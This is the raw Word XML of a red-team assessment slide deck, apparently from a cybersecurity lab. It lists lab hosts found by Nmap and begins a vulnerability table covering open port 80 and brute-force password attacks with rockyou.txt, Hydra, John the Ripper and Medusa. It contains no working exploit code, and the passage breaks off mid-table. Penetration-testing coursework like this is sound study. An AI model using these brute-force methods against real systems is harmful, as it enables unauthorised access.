                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CB8E7" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCE4378" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FF2C5C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="21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62559020" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487172608" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47729459" wp14:editId="11B1E530">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>274319</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>274879</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="8595332" cy="4608635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32" cy="460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6F924" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60108190" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744766F2" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="724558DB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696ECF01" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B084688" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6786C232" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D4DC7E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1BAFED" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D39155A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="13" w:line="907" w:lineRule="exact"/>
        <w:ind w:left="457" w:right="556"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>Red Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F4FA16" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:line="907" w:lineRule="exact"/>
        <w:ind w:left="457" w:right="562"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:sz w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2AD00B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B7C1CB9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4366C02C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E71F17" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A09DA8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CD09E1" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6900BA07" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BED8EB6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4388B2BC" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3DAF3C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7881F0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1DB8D1" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="97"/>
        <w:ind w:right="250"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58480197" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:sectPr w:rsidR="00377979">
          <w:pgSz w:w="14400" w:h="8100" w:orient="landscape"/>
          <w:pgMar w:top="720" w:right="180" w:bottom="0" w:left="280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D71EBA0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:ind w:left="457" w:right="264"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recon: Describing the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766936EF" w14:textId="6AEE07D8" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial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70B22785" wp14:editId="4F542A77">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>102235</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="123" name="Lin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AF921" id="Line 113" o:spid="_x0000_s1026" style="position:absolute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8.05pt" to="698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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D588C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="146"/>
        <w:ind w:left="439"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:w w:val="105"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Nmap identiﬁed the following hosts on the network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EAD817" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="388" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="77909C"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="77909C"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="77909C"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="77909C"/>
          <w:insideH w:val="single" w:sz="6" w:space="0" w:color="77909C"/>
          <w:insideV w:val="single" w:sz="6" w:space="0" w:color="77909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81"/>
        <w:gridCol w:w="4381"/>
        <w:gridCol w:w="4381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00377979" w14:paraId="05C151ED" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="619"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="990000"/>
          </w:tcPr>
          <w:p w14:paraId="1A70AD0B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="117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Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="990000"/>
          </w:tcPr>
          <w:p w14:paraId="6FAB4BCC" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="117"/>
              <w:ind w:left="285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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="990000"/>
          </w:tcPr>
          <w:p w14:paraId="1987B1EB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="117"/>
              <w:ind w:left="285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Role on Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377979" w14:paraId="52CFFA45" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1234"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6470A47F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1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Hyper-v</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Azure Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBD8E8"/>
          </w:tcPr>
          <w:p w14:paraId="50638D34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192.168.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="162CE167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Cloud Based Host Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377979" w14:paraId="63675D8A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1234"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FC0F858" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15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Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBD8E8"/>
          </w:tcPr>
          <w:p w14:paraId="7904022F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192.168.1.90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29D4CA73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Attacking Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377979" w14:paraId="7908C447" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1234"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F7C6714" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15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Capstone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBD8E8"/>
          </w:tcPr>
          <w:p w14:paraId="328B2BFB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192.168.1.105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2022FB20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Target Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377979" w14:paraId="353CC0EE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1234"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="605EC6D6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D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ELK stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBD8E8"/>
          </w:tcPr>
          <w:p w14:paraId="2EFEE113" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph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192.168.1.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="030D6DDF" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218" w:lineRule="auto"/>
              <w:ind w:left="285"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Networking Monitoring VM running Kibana logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76C237C9" w14:textId="21D71D05" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial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7DA30549" wp14:editId="078203C4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>125730</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="122" name="Lin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5FF658" id="Line 112" o:spid="_x0000_s1026" style="position:absolute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9.9pt" to="698.4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" strokecolor="#a8b6bf">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E31C3F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="13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0ABF6B0A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="75"/>
        <w:ind w:left="457" w:right="262"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:w w:val="105"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7A236A" w14:textId="2F53B1B7" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial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20EB7FA" wp14:editId="200307EC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>102235</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="121" name="Lin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8C45EF" id="Line 111" o:spid="_x0000_s1026" style="position:absolute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8.05pt" to="698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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AD8FF9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="146"/>
        <w:ind w:left="439"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:w w:val="105"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>The assessment uncovered the following critical vulnerabilities in the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3178FDAD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="463" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="A8B6BF"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="A8B6BF"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="A8B6BF"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="A8B6BF"/>
          <w:insideH w:val="single" w:sz="6" w:space="0" w:color="A8B6BF"/>
          <w:insideV w:val="single" w:sz="6" w:space="0" w:color="A8B6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90"/>
        <w:gridCol w:w="4390"/>
        <w:gridCol w:w="4390"/>
      </w:tblGrid>
      <w:tr w:rsidR="00377979" w14:paraId="415BC807" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="610"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="990000"/>
          </w:tcPr>
          <w:p w14:paraId="09A8B4DC" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="113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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="990000"/>
          </w:tcPr>
          <w:p w14:paraId="282F1BB0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="113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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="990000"/>
          </w:tcPr>
          <w:p w14:paraId="3245F885" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="113"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377979" w14:paraId="763A6268" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1193"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="791599D8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218" w:lineRule="auto"/>
              <w:ind w:right="654"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Port 80 open with public access CVE-2019-6579</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBD8E8"/>
          </w:tcPr>
          <w:p w14:paraId="4CBBE37C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218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Open and unsecured access for anyone using port 80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F12FB2A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218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Folders and ﬁles are readily accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377979" w14:paraId="65B01F7A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38DE1C0E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218" w:lineRule="auto"/>
              <w:ind w:right="2352"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Brute Force CVE-2019-3746</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBD8E8"/>
          </w:tcPr>
          <w:p w14:paraId="3BE70AB2" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218" w:lineRule="auto"/>
              <w:ind w:right="186"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Attacker attempts to gain access with a script that tries numerous combinations using a password list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29921EB0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="129" w:line="218" w:lineRule="auto"/>
              <w:ind w:right="654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password lists like rockyou.txt by scripts such </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>as ”John</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> the Ripper”, “Hydra”, “Medusa” etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377979" w14:paraId="6BC3F3AF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1193"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
